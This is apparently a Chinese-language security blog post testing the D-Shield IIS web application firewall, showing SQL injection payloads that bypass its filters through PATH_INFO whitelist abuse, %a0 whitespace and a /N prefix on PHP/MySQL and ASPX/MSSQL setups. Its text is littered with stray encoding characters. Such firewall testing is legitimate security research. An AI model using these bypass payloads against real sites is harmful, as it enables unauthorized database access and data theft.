0X01 前言
D盾_IIS防火墻,目前只支持Win2003服務器����,前陣子看見官方博客說D盾新版將近期推出,相信功能會更強大���,這邊分享一下之前的SQL注入防御的測試情況�。D盾_IIS防火墻注入防御策略����,如下圖��,主要防御GET/POST/COOKIE�����,文件允許白名單設置。構造不同的測試環境�����,IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL)����,看到這邊的策略��,主要的測試思路:
a��、白名單 b���、繞過union select或select from的檢測
0X02 IIS+PHP+MYSQL
搭建這個window2003+IIS+php+mysql��,可花費不少時間,測試過程還蠻順利的����,先來一張攔截圖:
繞過姿勢一:白名單
PHP中的PATH_INFO問題,簡單來說呢�,就是
http:/x.x.x.x/3.php?id=1 等價于 http://x.x.x.x/3.php/xxxxxxxxxxxxx?id=1
從白名單中隨便挑個地址加在后面�����,可成功bypass,http://10.9.10.206/3.php/admin.php?id=1 union select 1,2,schema_name from information_schema.SCHEMATA
經測試����,GET��、POST����、COOKIE均有效,完全bypass
繞過姿勢二:空白字符
Mysql中可以利用的空白字符有:%09,%0a,%0b,%0c,%0d,%20,%a0�;
測試了一下,基本上針對MSSQL的[0x01-0x20]都被處理了����,唯獨在Mysql中還有一個%a0可以利用��,可以看到%a0與select合體�����,無法識別,從而繞過����。
id=1 union%a0select 1,2,3 from admin
繞過姿勢三:/N形式
主要思考問題,如何繞過union select以及select from����?
如果說上一個姿勢是union和select之間的位置的探索,那么是否可以考慮在union前面進行檢測呢�����?
為此在參數與union的位置��,經測試��,發現/N可以繞過union select檢測���,同樣方式繞過select from的檢測�。
id=/Nunion(select 1,schema_name,/Nfrom information_schema.schemata)
0X03 IIS+ASP/ASPX+MSSQL
搭建IIS+ASP/ASPX+MSSQL環境,思路一致���,只是語言與數據庫特性有些許差異�,繼續來張D盾攔截圖:
繞過姿勢一:白名單
ASP: 不支持,找不到路徑�,而且D盾禁止執行帶非法字符或特殊目錄的腳本(/1.asp/x),撤底沒戲了
/admin.php/../1.asp?id=1 and 1=1 攔截
/1.asp?b=admin.php&id=1 and 1=1 攔截��,可見D盾會識別到文件的位置,并不是只檢測URL存在白名單那么簡單了����。。����。
ASPX:與PHP類似 /1.aspx/admin.php?id=1 union select 1,'2',TABLE_NAME from INFORMATION_SCHEMA.TABLES 可成功bypass
